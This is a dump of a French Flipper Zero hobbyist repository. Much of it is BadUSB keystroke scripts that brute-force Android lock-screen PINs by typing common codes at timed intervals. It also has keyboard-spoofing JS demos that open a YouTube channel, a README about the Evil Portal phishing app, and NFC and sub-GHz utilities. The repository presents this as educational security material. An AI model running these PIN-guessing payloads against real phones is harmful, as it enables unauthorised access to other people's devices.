DELAY 31000 25 | 26 | DELAY 4500 27 | STRING 4444 28 | DELAY 4500 29 | 30 | DELAY 4500 31 | STRING 5555 32 | DELAY 4500 33 | 34 | DELAY 4500 35 | STRING 6666 36 | DELAY 4500 37 | 38 | DELAY 4500 39 | STRING 7777 40 | DELAY 4500 41 | 42 | DELAY 4500 43 | STRING 8888 44 | DELAY 4500 45 | 46 | DELAY 4500 47 | STRING x 48 | DELAY 4500 49 | 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/5000_delay_4_digit_pin_bf_test_no_enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 5000 5 | STRING 4321 6 | DELAY 5000 7 | 8 | DELAY 5000 9 | STRING 1111 10 | DELAY 5000 11 | 12 | DELAY 5000 13 | STRING 2222 14 | DELAY 5000 15 | 16 | DELAY 5000 17 | STRING 3333 18 | DELAY 5000 19 | 20 | DELAY 5000 21 | STRING 1234 22 | DELAY 5000 23 | 24 | DELAY 31000 25 | 26 | DELAY 5000 27 | STRING 4444 28 | DELAY 5000 29 | 30 | DELAY 5000 31 | STRING 5555 32 | DELAY 5000 33 | 34 | DELAY 5000 35 | STRING 6666 36 | DELAY 5000 37 | 38 | DELAY 5000 39 | STRING 7777 40 | DELAY 5000 41 | 42 | DELAY 5000 43 | STRING 8888 44 | DELAY 5000 45 | 46 | DELAY 5000 47 | STRING x 48 | DELAY 5000 49 | 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/5500_delay_4_digit_pin_bf_test_no_enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 5500 5 | STRING 4321 6 | DELAY 5500 7 | 8 | DELAY 5500 9 | STRING 1111 10 | DELAY 5500 11 | 12 | DELAY 5500 13 | STRING 2222 14 | DELAY 5500 15 | 16 | DELAY 5500 17 | STRING 3333 18 | DELAY 5500 19 | 20 | DELAY 5500 21 | STRING 1234 22 | DELAY 5500 23 | 24 | DELAY 31000 25 | 26 | DELAY 5500 27 | STRING 4444 28 | DELAY 5500 29 | 30 | DELAY 5500 31 | STRING 5555 32 | DELAY 5500 33 | 34 | DELAY 5500 35 | STRING 6666 36 | DELAY 5500 37 | 38 | DELAY 5500 39 | STRING 7777 40 | DELAY 5500 41 | 42 | DELAY 5500 43 | STRING 8888 44 | DELAY 5500 45 | 46 | DELAY 5500 47 | STRING x 48 | DELAY 5500 49 | 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/1000_delay_4_digit_pin_bf_test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 1000 5 | STRING 4321 6 | DELAY 1000 7 | ENTER 8 | DELAY 1000 9 | STRING 1111 10 | DELAY 1000 11 | ENTER 12 | DELAY 1000 13 | STRING 2222 14 | DELAY 1000 15 | ENTER 16 | DELAY 1000 17 | STRING 3333 18 | DELAY 1000 19 | ENTER 20 | DELAY 1000 21 | STRING 1234 22 | DELAY 1000 23 | ENTER 24 | DELAY 31000 25 | 26 | DELAY 1000 27 | STRING 4444 28 | DELAY 1000 29 | ENTER 30 | DELAY 1000 31 | STRING 5555 32 | DELAY 1000 33 | ENTER 34 | DELAY 1000 35 | STRING 6666 36 | DELAY 1000 37 | ENTER 38 | DELAY 1000 39 | STRING 7777 40 | DELAY 1000 41 | ENTER 42 | DELAY 1000 43 | STRING 8888 44 | DELAY 1000 45 | ENTER 46 | DELAY 1000 47 | STRING x 48 | DELAY 1000 49 | ENTER 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/1500_delay_4_digit_pin_bf_test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 1500 5 | STRING 4321 6 | DELAY 1500 7 | ENTER 8 | DELAY 1500 9 | STRING 1111 10 | DELAY 1500 11 | ENTER 12 | DELAY 1500 13 | STRING 2222 14 | DELAY 1500 15 | ENTER 16 | DELAY 1500 17 | STRING 3333 18 | DELAY 1500 19 | ENTER 20 | DELAY 1500 21 | STRING 1234 22 | DELAY 1500 23 | ENTER 24 | DELAY 31000 25 | 26 | DELAY 1500 27 | STRING 4444 28 | DELAY 1500 29 | ENTER 30 | DELAY 1500 31 | STRING 5555 32 | DELAY 1500 33 | ENTER 34 | DELAY 1500 35 | STRING 6666 36 | DELAY 1500 37 | ENTER 38 | DELAY 1500 39 | STRING 7777 40 | DELAY 1500 41 | ENTER 42 | DELAY 1500 43 | STRING 8888 44 | DELAY 1500 45 | ENTER 46 | DELAY 1500 47 | STRING x 48 | DELAY 1500 49 | ENTER 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/2000_delay_4_digit_pin_bf_test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 2000 5 | STRING 4321 6 | DELAY 2000 7 | ENTER 8 | DELAY 2000 9 | STRING 1111 10 | DELAY 2000 11 | ENTER 12 | DELAY 2000 13 | STRING 2222 14 | DELAY 2000 15 | ENTER 16 | DELAY 2000 17 | STRING 3333 18 | DELAY 2000 19 | ENTER 20 | DELAY 2000 21 | STRING 1234 22 | DELAY 2000 23 | ENTER 24 | DELAY 31000 25 | 26 | DELAY 2000 27 | STRING 4444 28 | DELAY 2000 29 | ENTER 30 | DELAY 2000 31 | STRING 5555 32 | DELAY 2000 33 | ENTER 34 | DELAY 2000 35 | STRING 6666 36 | DELAY 2000 37 | ENTER 38 | DELAY 2000 39 | STRING 7777 40 | DELAY 2000 41 | ENTER 42 | DELAY 2000 43 | STRING 8888 44 | DELAY 2000 45 | ENTER 46 | DELAY 2000 47 | STRING x 48 | DELAY 2000 49 | ENTER 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/2500_delay_4_digit_pin_bf_test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 2500 5 | STRING 4321 6 | DELAY 2500 7 | ENTER 8 | DELAY 2500 9 | STRING 1111 10 | DELAY 2500 11 | ENTER 12 | DELAY 2500 13 | STRING 2222 14 | DELAY 2500 15 | ENTER 16 | DELAY 2500 17 | STRING 3333 18 | DELAY 2500 19 | ENTER 20 | DELAY 2500 21 | STRING 1234 22 | DELAY 2500 23 | ENTER 24 | DELAY 31000 25 | 26 | DELAY 2500 27 | STRING 4444 28 | DELAY 2500 29 | ENTER 30 | DELAY 2500 31 | STRING 5555 32 | DELAY 2500 33 | ENTER 34 | DELAY 2500 35 | STRING 6666 36 | DELAY 2500 37 | ENTER 38 | DELAY 2500 39 | STRING 7777 40 | DELAY 2500 41 | ENTER 42 | DELAY 2500 43 | STRING 8888 44 | DELAY 2500 45 | ENTER 46 | DELAY 2500 47 | STRING x 48 | DELAY 2500 49 | ENTER 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/3000_delay_4_digit_pin_bf_test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 3000 5 | STRING 4321 6 | DELAY 3000 7 | ENTER 8 | DELAY 3000 9 | STRING 1111 10 | DELAY 3000 11 | ENTER 12 | DELAY 3000 13 | STRING 2222 14 | DELAY 3000 15 | ENTER 16 | DELAY 3000 17 | STRING 3333 18 | DELAY 3000 19 | ENTER 20 | DELAY 3000 21 | STRING 1234 22 | DELAY 3000 23 | ENTER 24 | DELAY 31000 25 | 26 | DELAY 3000 27 | STRING 4444 28 | DELAY 3000 29 | ENTER 30 | DELAY 3000 31 | STRING 5555 32 | DELAY 3000 33 | ENTER 34 | DELAY 3000 35 | STRING 6666 36 | DELAY 3000 37 | ENTER 38 | DELAY 3000 39 | STRING 7777 40 | DELAY 3000 41 | ENTER 42 | DELAY 3000 43 | STRING 8888 44 | DELAY 3000 45 | ENTER 46 | DELAY 3000 47 | STRING x 48 | DELAY 3000 49 | ENTER 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/3500_delay_4_digit_pin_bf_test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 3500 5 | STRING 4321 6 | DELAY 3500 7 | ENTER 8 | DELAY 3500 9 | STRING 1111 10 | DELAY 3500 11 | ENTER 12 | DELAY 3500 13 | STRING 2222 14 | DELAY 3500 15 | ENTER 16 | DELAY 3500 17 | STRING 3333 18 | DELAY 3500 19 | ENTER 20 | DELAY 3500 21 | STRING 1234 22 | DELAY 3500 23 | ENTER 24 | DELAY 31000 25 | 26 | DELAY 3500 27 | STRING 4444 28 | DELAY 3500 29 | ENTER 30 | DELAY 3500 31 | STRING 5555 32 | DELAY 3500 33 | ENTER 34 | DELAY 3500 35 | STRING 6666 36 | DELAY 3500 37 | ENTER 38 | DELAY 3500 39 | STRING 7777 40 | DELAY 3500 41 | ENTER 42 | DELAY 3500 43 | STRING 8888 44 | DELAY 3500 45 | ENTER 46 | DELAY 3500 47 | STRING x 48 | DELAY 3500 49 | ENTER 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/4500_delay_4_digit_pin_bf_test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 4500 5 | STRING 4321 6 | DELAY 4500 7 | ENTER 8 | DELAY 4500 9 | STRING 1111 10 | DELAY 4500 11 | ENTER 12 | DELAY 4500 13 | STRING 2222 14 | DELAY 4500 15 | ENTER 16 | DELAY 4500 17 | STRING 3333 18 | DELAY 4500 19 | ENTER 20 | DELAY 4500 21 | STRING 1234 22 | DELAY 4500 23 | ENTER 24 | DELAY 31000 25 | 26 | DELAY 4500 27 | STRING 4444 28 | DELAY 4500 29 | ENTER 30 | DELAY 4500 31 | STRING 5555 32 | DELAY 4500 33 | ENTER 34 | DELAY 4500 35 | STRING 6666 36 | DELAY 4500 37 | ENTER 38 | DELAY 4500 39 | STRING 7777 40 | DELAY 4500 41 | ENTER 42 | DELAY 4500 43 | STRING 8888 44 | DELAY 4500 45 | ENTER 46 | DELAY 4500 47 | STRING x 48 | DELAY 4500 49 | ENTER 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/5000_delay_4_digit_pin_bf_test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 5000 5 | STRING 4321 6 | DELAY 5000 7 | ENTER 8 | DELAY 5000 9 | STRING 1111 10 | DELAY 5000 11 | ENTER 12 | DELAY 5000 13 | STRING 2222 14 | DELAY 5000 15 | ENTER 16 | DELAY 5000 17 | STRING 3333 18 | DELAY 5000 19 | ENTER 20 | DELAY 5000 21 | STRING 1234 22 | DELAY 5000 23 | ENTER 24 | DELAY 31000 25 | 26 | DELAY 5000 27 | STRING 4444 28 | DELAY 5000 29 | ENTER 30 | DELAY 5000 31 | STRING 5555 32 | DELAY 5000 33 | ENTER 34 | DELAY 5000 35 | STRING 6666 36 | DELAY 5000 37 | ENTER 38 | DELAY 5000 39 | STRING 7777 40 | DELAY 5000 41 | ENTER 42 | DELAY 5000 43 | STRING 8888 44 | DELAY 5000 45 | ENTER 46 | DELAY 5000 47 | STRING x 48 | DELAY 5000 49 | ENTER 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/5500_delay_4_digit_pin_bf_test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 5500 5 | STRING 4321 6 | DELAY 5500 7 | ENTER 8 | DELAY 5500 9 | STRING 1111 10 | DELAY 5500 11 | ENTER 12 | DELAY 5500 13 | STRING 2222 14 | DELAY 5500 15 | ENTER 16 | DELAY 5500 17 | STRING 3333 18 | DELAY 5500 19 | ENTER 20 | DELAY 5500 21 | STRING 1234 22 | DELAY 5500 23 | ENTER 24 | DELAY 31000 25 | 26 | DELAY 5500 27 | STRING 4444 28 | DELAY 5500 29 | ENTER 30 | DELAY 5500 31 | STRING 5555 32 | DELAY 5500 33 | ENTER 34 | DELAY 5500 35 | STRING 6666 36 | DELAY 5500 37 | ENTER 38 | DELAY 5500 39 | STRING 7777 40 | DELAY 5500 41 | ENTER 42 | DELAY 5500 43 | STRING 8888 44 | DELAY 5500 45 | ENTER 46 | DELAY 5500 47 | STRING x 48 | DELAY 5500 49 | ENTER 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/6000_delay_4_digit_pin_bf_test .txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 6000 5 | STRING 4321 6 | DELAY 6000 7 | ENTER 8 | DELAY 6000 9 | STRING 1111 10 | DELAY 6000 11 | ENTER 12 | DELAY 6000 13 | STRING 2222 14 | DELAY 6000 15 | ENTER 16 | DELAY 6000 17 | STRING 3333 18 | DELAY 6000 19 | ENTER 20 | DELAY 6000 21 | STRING 1234 22 | DELAY 6000 23 | ENTER 24 | DELAY 31000 25 | 26 | DELAY 6000 27 | STRING 4444 28 | DELAY 6000 29 | ENTER 30 | DELAY 6000 31 | STRING 5555 32 | DELAY 6000 33 | ENTER 34 | DELAY 6000 35 | STRING 6666 36 | DELAY 6000 37 | ENTER 38 | DELAY 6000 39 | STRING 7777 40 | DELAY 6000 41 | ENTER 42 | DELAY 6000 43 | STRING 8888 44 | DELAY 6000 45 | ENTER 46 | DELAY 6000 47 | STRING x 48 | DELAY 6000 49 | ENTER 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/6500_delay_4_digit_pin_bf_test.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | 4 | DELAY 6500 5 | STRING 4321 6 | DELAY 6500 7 | ENTER 8 | DELAY 6500 9 | STRING 1111 10 | DELAY 6500 11 | ENTER 12 | DELAY 6500 13 | STRING 2222 14 | DELAY 6500 15 | ENTER 16 | DELAY 6500 17 | STRING 3333 18 | DELAY 6500 19 | ENTER 20 | DELAY 6500 21 | STRING 1234 22 | DELAY 6500 23 | ENTER 24 | DELAY 31000 25 | 26 | DELAY 6500 27 | STRING 4444 28 | DELAY 6500 29 | ENTER 30 | DELAY 6500 31 | STRING 5555 32 | DELAY 6500 33 | ENTER 34 | DELAY 6500 35 | STRING 6666 36 | DELAY 6500 37 | ENTER 38 | DELAY 6500 39 | STRING 7777 40 | DELAY 6500 41 | ENTER 42 | DELAY 6500 43 | STRING 8888 44 | DELAY 6500 45 | ENTER 46 | DELAY 6500 47 | STRING x 48 | DELAY 6500 49 | ENTER 50 | DELAY 31000 51 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/6000_delay_4_digit_pin_bf_test_no_enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 4 | 5 | DELAY 6000 6 | STRING 4321 7 | DELAY 6000 8 | 9 | DELAY 6000 10 | STRING 1111 11 | DELAY 6000 12 | 13 | DELAY 6000 14 | STRING 2222 15 | DELAY 6000 16 | 17 | DELAY 6000 18 | STRING 3333 19 | DELAY 6000 20 | 21 | DELAY 6000 22 | STRING 1234 23 | DELAY 6000 24 | 25 | DELAY 31000 26 | 27 | DELAY 6000 28 | STRING 4444 29 | DELAY 6000 30 | 31 | DELAY 6000 32 | STRING 5555 33 | DELAY 6000 34 | 35 | DELAY 6000 36 | STRING 6666 37 | DELAY 6000 38 | 39 | DELAY 6000 40 | STRING 7777 41 | DELAY 6000 42 | 43 | DELAY 6000 44 | STRING 8888 45 | DELAY 6000 46 | 47 | DELAY 6000 48 | STRING x 49 | DELAY 6000 50 | 51 | DELAY 31000 52 | -------------------------------------------------------------------------------- /badusb/android/pin_brute_force/6500_delay_4_digit_pin_bf_test_no_enter.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | 3 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 4 | 5 | DELAY 6500 6 | STRING 4321 7 | DELAY 6500 8 | 9 | DELAY 6500 10 | STRING 1111 11 | DELAY 6500 12 | 13 | DELAY 6500 14 | STRING 2222 15 | DELAY 6500 16 | 17 | DELAY 6500 18 | STRING 3333 19 | DELAY 6500 20 | 21 | DELAY 6500 22 | STRING 1234 23 | DELAY 6500 24 | 25 | DELAY 31000 26 | 27 | DELAY 6500 28 | STRING 4444 29 | DELAY 6500 30 | 31 | DELAY 6500 32 | STRING 5555 33 | DELAY 6500 34 | 35 | DELAY 6500 36 | STRING 6666 37 | DELAY 6500 38 | 39 | DELAY 6500 40 | STRING 7777 41 | DELAY 6500 42 | 43 | DELAY 6500 44 | STRING 8888 45 | DELAY 6500 46 | 47 | DELAY 6500 48 | STRING x 49 | DELAY 6500 50 | 51 | DELAY 31000 52 | -------------------------------------------------------------------------------- /scripts/01_poc_js_kanjian_WIN_layout.js: -------------------------------------------------------------------------------- 1 | /* 2 | * Author: inazo 3 | * Youtube Channel: https://youtube.com/@kanjian_fr 4 | * GitHub: https://github.com/inaz0/flipperZero/tree/main/scripts/ 5 | * 6 | * Le moteur JS utilisé : https://github.com/cesanta/mjs 7 | * Inspiration of code: https://github.com/jetblk/Flipper-Zero-JavaScript/blob/main/Scripts/CVE-2024-1086.js 8 | * https://github.com/jamisonderek/flipper-zero-tutorials/blob/main/js/badusb/badusbdemo.js 9 | 10 | * Version avec Layout FR 11 | */ 12 | let badusb = require("badusb"); 13 | let dialog = require("dialog"); 14 | 15 | //-- On set le layout du clavier super important ! 16 | let layout = "fr-FR"; 17 | 18 | 19 | // Setup BadUSB connection 20 | badusb.setup({ vid: 0x046d, pid: 0xc33f, mfr_name: "Logitech, Inc", prod_name: "Keyboard", layout_path: "/ext/badusb/assets/layouts/" + layout + ".kl" }); 21 | print("Waiting for connection"); 22 | while (!badusb.isConnected()) { 23 | delay(1000); 24 | } 25 | 26 | 27 | // ************ 28 | // Show a dialog to pause execution until ready 29 | dialog.message("Test badUSB via JS Script avec Layout FR", "Press OK to start"); 30 | 31 | 32 | print("Overture de la chaine @Kanjian_fr"); 33 | delay(500); 34 | badusb.press("GUI", "r"); 35 | delay(500); 36 | 37 | badusb.print("https://www.youtube.com/@kanjian_fr?sub_confirmation=1"); 38 | 39 | delay(500); 40 | 41 | badusb.press("ENTER"); 42 | 43 | delay(500); 44 | 45 | 46 | //-- On sort du mode "clavier" 47 | badusb.quit(); 48 | 49 | print("Script Complete."); 50 | -------------------------------------------------------------------------------- /wifi/README.md: -------------------------------------------------------------------------------- 1 | # Code HTML pour l'application Evil Portal du Flipper Zero 2 | 3 | ## Disclamer 4 | 5 | Les fichiers mis à disposition le sont à des fins d'éducation et test de sécurité que l'on pourrait mener, tout usage illégal qui en serait fait ne pourrait mettre reproché. 6 | 7 | ## Description de l'application Evil Portail 8 | 9 | Retrouvé ici ma vidéo d'explication sur l'utilisation de l'Evil Portal : 10 | 11 | [![[FR] Evil Portal avec le Flipper Zero, explication complète !](https://img.youtube.com/vi/AASLLnfQb84/0.jpg)](https://www.youtube.com/watch?v=AASLLnfQb84 "[FR] Evil Portal avec le Flipper Zero, explication complète !") 12 | 13 | ## Infos complémentaires 14 | 15 | ------------------ Les indispensables du FlipperZero ---------------- 16 | 17 | 📦Le Flipper Zero : https://amzn.to/3PdLlzX 18 | 19 | 📦Une coque en silicone (noire) : https://amzn.to/3LkR4CS 20 | 21 | 📦Une coque en silicone (blanche) : https://amzn.to/3r8ENuv 22 | 23 | 📦Une coque en silicone (orange) : https://amzn.to/44PqHMq (officiel et plus cher que les deux autres) 24 | 25 | 📦Vitre de protection (pack de deux) : https://amzn.to/3RkluZL 26 | 27 | 📦Une dragonne pour plus de sécurité : https://amzn.to/3PdLKlX 28 | 29 | 30 | ------------------ Communauté / soutient ------------------ 31 | 32 | 🧑‍💻Discord : https://discord.gg/EGQJurMUwh 33 | 34 | 🕊️Mon twitter : https://twitter.com/bsmt_nevers 35 | 36 | ☕Soutenez moi via : https://www.buymeacoffee.com/inazo 37 | 38 | 🧺Retrouvez ma boutique de goodies sur : https://kanjian.myspreadshop.fr/ 39 | -------------------------------------------------------------------------------- /nfc/tools/flipper_zero_nfc_keys_splitting.py: -------------------------------------------------------------------------------- 1 | import os 2 | import argparse, sys 3 | 4 | parser=argparse.ArgumentParser() 5 | 6 | parser.add_argument("--in", help="path for the NFC key file to split") 7 | parser.add_argument("--out", help="path and name of file of results") 8 | 9 | args=vars(parser.parse_args()) 10 | 11 | 12 | 13 | if len(args) > 0 : 14 | 15 | the_input_file = args.get('in') 16 | 17 | keys_for_splitting_file = open(the_input_file, 'r') 18 | lines = keys_for_splitting_file.readlines() 19 | 20 | count = 0 21 | count_no_duplicate = 0 22 | 23 | # Some info for file generated 24 | the_line_to_write = ['# Keys splitting with flipper_zero_nfc_keys_splitting.py\n# Author: inazo\n# GitHub: https://github.com/inaz0/flipperZero\n# Youtube Channel: https://www.youtube.com/@kanjian_fr/\n\n'] 25 | 26 | # Parsing the lines 27 | 28 | for line in lines: 29 | 30 | line = line.strip() + '\n' 31 | first_char_of_line = line[0] 32 | 33 | # if it's a comment we keep it in the file 34 | if first_char_of_line == '#' : 35 | the_line_to_write.append( line ) 36 | else: 37 | # no difference for the flipper if line are uppercase or not 38 | line = line.upper() 39 | 40 | count += 1 41 | 42 | if line not in the_line_to_write : 43 | the_line_to_write.append( line ) 44 | count_no_duplicate += 1 45 | 46 | 47 | # Saving results 48 | output_result_file = open( args.get('out') , 'w') 49 | output_result_file.writelines( the_line_to_write ) 50 | output_result_file.close() 51 | 52 | 53 | print('Number of keys before splitting: ' + str(count)) 54 | print('Number of keys after splitting: ' + str(count_no_duplicate)) 55 | 56 | 57 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Mes fichiers / outils utiles pour le Flipper Zero 2 | 3 | Retrouvez ici des fichiers et des bouts de code ou autre que j'utilise dans mes vidéos et autres ressources quand cela est pertinant : 4 | 5 | ### NFC 6 | 7 | - Mon fichier de clé custom pour mon flipper (dédoublonné) : https://github.com/inaz0/flipperZero/tree/main/nfc/dict 8 | - Mon petit outil pour dédoublonner votre fichier user de clé NFC : https://github.com/inaz0/flipperZero/tree/main/nfc/tools 9 | 10 | ## Ma chaîne Youtube sur le Flipper Zero : 11 | 12 | 🎞️ https://www.youtube.com/channel/@Kanjian_fr 13 | 14 | [![Ma chaîne Youtube](https://yt3.googleusercontent.com/ZTyESfQjVuNcqrrBROeB1SDHxqAT5aRcLq9r1nXZKeQc1WnwJ2uDedAb3IUEv9ovBWKxnV0r0A=s176-c-k-c0x00ffffff-no-rj)](https://www.youtube.com/channel/UCUpLghnyh9zuF3wghk6ZUng "Ma chaîne Youtube") 15 | 16 | 17 | ## Infos complémentaires 18 | 19 | ------------------ Les indispensables du FlipperZero ---------------- 20 | 21 | 📦Le Flipper Zero : https://amzn.to/3PdLlzX 22 | 23 | 📦Une coque en silicone (noire) : https://amzn.to/3LkR4CS 24 | 25 | 📦Une coque en silicone (blanche) : https://amzn.to/3r8ENuv 26 | 27 | 📦Une coque en silicone (orange) : https://amzn.to/44PqHMq (officiel et plus cher que les deux autres) 28 | 29 | 📦Vitre de protection (pack de deux) : https://amzn.to/3RkluZL 30 | 31 | 📦Une dragonne pour plus de sécurité : https://amzn.to/3PdLKlX 32 | 33 | 34 | ------------------ Communauté / soutient ------------------ 35 | 36 | 🧑‍💻Discord : https://discord.gg/EGQJurMUwh 37 | 38 | 🕊️Mon twitter : https://twitter.com/bsmt_nevers 39 | 40 | ☕Soutenez moi via : https://www.buymeacoffee.com/inazo 41 | 42 | 🧺Retrouvez ma boutique de goodies sur : https://kanjian.myspreadshop.fr/ 43 | -------------------------------------------------------------------------------- /badusb/kanjian_test_keys_bad_usb/kanjian-test-keys.txt: -------------------------------------------------------------------------------- 1 | REM fichier de test de touche badkb pour le flipperzero 2 | REM Credit: Inazo https://www.youtube.com/@kanjian_fr 3 | 4 | DELAY 3000 5 | STRING a 6 | DELAY 3000 7 | STRING b 8 | DELAY 3000 9 | STRING c 10 | DELAY 3000 11 | STRING d 12 | DELAY 3000 13 | STRING e 14 | DELAY 3000 15 | STRING f 16 | DELAY 3000 17 | STRING g 18 | DELAY 3000 19 | STRING h 20 | DELAY 3000 21 | STRING i 22 | DELAY 3000 23 | STRING j 24 | DELAY 3000 25 | STRING k 26 | DELAY 3000 27 | STRING l 28 | DELAY 3000 29 | STRING m 30 | DELAY 3000 31 | STRING n 32 | DELAY 3000 33 | STRING o 34 | DELAY 3000 35 | STRING p 36 | DELAY 3000 37 | STRING q 38 | DELAY 3000 39 | STRING r 40 | DELAY 3000 41 | STRING s 42 | DELAY 3000 43 | STRING t 44 | DELAY 3000 45 | STRING u 46 | DELAY 3000 47 | STRING v 48 | DELAY 3000 49 | STRING x 50 | DELAY 3000 51 | STRING y 52 | DELAY 3000 53 | STRING z 54 | DELAY 3000 55 | STRING & 56 | DELAY 3000 57 | STRING é 58 | DELAY 3000 59 | STRING " 60 | DELAY 3000 61 | STRING ' 62 | DELAY 3000 63 | STRING ( 64 | DELAY 3000 65 | STRING f 66 | DELAY 3000 67 | STRING - 68 | DELAY 3000 69 | STRING è 70 | DELAY 3000 71 | STRING _ 72 | DELAY 3000 73 | STRING ç 74 | DELAY 3000 75 | STRING à 76 | DELAY 3000 77 | STRING ) 78 | DELAY 3000 79 | STRING = 80 | DELAY 3000 81 | LEFTARROW 82 | DELAY 3000 83 | UPARROW 84 | DELAY 3000 85 | RIGHTARROW 86 | DELAY 3000 87 | STRING 0123456789 88 | DELAY 3000 89 | STRING /*-+!:;,*ù^$ 90 | DELAY 3000 91 | GUI TAB 92 | DELAY 3000 93 | CONTROL ESCAPE 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | -------------------------------------------------------------------------------- /scripts/01_poc_js_kanjian_WIN.js: -------------------------------------------------------------------------------- 1 | /* 2 | * Author: inazo 3 | * Youtube Channel: https://youtube.com/@kanjian_fr 4 | * GitHub: https://github.com/inaz0/flipperZero/tree/main/scripts/ 5 | * 6 | * Le moteur JS utilisé : https://github.com/cesanta/mjs 7 | * Inspiration of code: https://github.com/jetblk/Flipper-Zero-JavaScript/blob/main/Scripts/CVE-2024-1086.js 8 | * https://github.com/jamisonderek/flipper-zero-tutorials/blob/main/js/badusb/badusbdemo.js 9 | */ 10 | let badusb = require("badusb"); 11 | let dialog = require("dialog"); 12 | 13 | //-- On set le layout du clavier super important ! 14 | let layout = "us-US"; 15 | 16 | 17 | // Setup BadUSB connection 18 | badusb.setup({ vid: 0x046d, pid: 0xc33f, mfr_name: "Logitech, Inc", prod_name: "Keyboard", layout_path: "/ext/badusb/assets/layouts/" + layout + ".kl" }); 19 | print("Waiting for connection"); 20 | while (!badusb.isConnected()) { 21 | delay(1000); 22 | } 23 | 24 | 25 | // ************ 26 | // Show a dialog to pause execution until ready 27 | dialog.message("Test badUSB via JS Script", "Press OK to start"); 28 | 29 | 30 | print("Overture du site kanjian.fr"); 31 | delay(500); 32 | badusb.press("GUI", "r"); 33 | delay(500); 34 | 35 | badusb.print("zzz"); 36 | badusb.press("SHIFT",","); 37 | badusb.print("youtube"); 38 | badusb.press("SHIFT",","); 39 | badusb.print("co;>"); 40 | badusb.press("CTRL","ALT","0"); 41 | badusb.print("kqnjiqn8fr>"); 42 | badusb.press("SHIFT","m"); 43 | // not working code 44 | /* 45 | for(let i=0;i<256;i++){ 46 | 47 | badusb.print(""+String.fromCharCode(i)+""); 48 | } 49 | */ 50 | 51 | // end of not working code 52 | 53 | //-- only for the video 54 | let arobase = chr(64); 55 | 56 | badusb.print("sub8confir;qtion="); 57 | badusb.press("SHIFT","1"); 58 | 59 | badusb.press("ENTER"); 60 | 61 | delay(500); 62 | 63 | 64 | //-- On sort du mode "clavier" 65 | badusb.quit(); 66 | 67 | print("Script Complete."); 68 | -------------------------------------------------------------------------------- /subghz/nexus-th/data_finder.py: -------------------------------------------------------------------------------- 1 | import sys, getopt 2 | import re 3 | 4 | inputfile='' 5 | 6 | # va nous servir pour avoir le rendu lisible des données 7 | def raw_data_to_human_readable(nexus_packet): 8 | 9 | count_bit = 0 10 | result = '' 11 | temp_result = '' 12 | for one_bit in nexus_packet: 13 | # print(one_bit) 14 | temp_result += one_bit 15 | count_bit += 1 16 | match count_bit: 17 | case 8: 18 | result += 'ID: ' + str(int(temp_result,2)) 19 | temp_result = '' 20 | 21 | case 9: 22 | result += ' - Battery: ' + str(int(temp_result,2)) 23 | temp_result = '' 24 | # toujours à 0 25 | case 10: 26 | temp_result = '' 27 | 28 | case 12: 29 | result += ' - Channel: ' + str(int(temp_result,2)) 30 | temp_result = '' 31 | case 24: 32 | #la température est mise à l'échelle par 10 est en celcius 33 | result += ' - Temperature: ' + str(int(temp_result,2) / 10) 34 | temp_result = '' 35 | #toujour quatre 1 36 | case 28: 37 | temp_result = '' 38 | case 36: 39 | result += ' - Humidity: ' + str(int(temp_result,2)) 40 | temp_result = '' 41 | 42 | print(result) 43 | 44 | 45 | def main(argv): 46 | global inputfile 47 | try: 48 | opts, args = getopt.getopt(argv,"hi:o:",["ifile=","ofile="]) 49 | except getopt.GetoptError: 50 | print 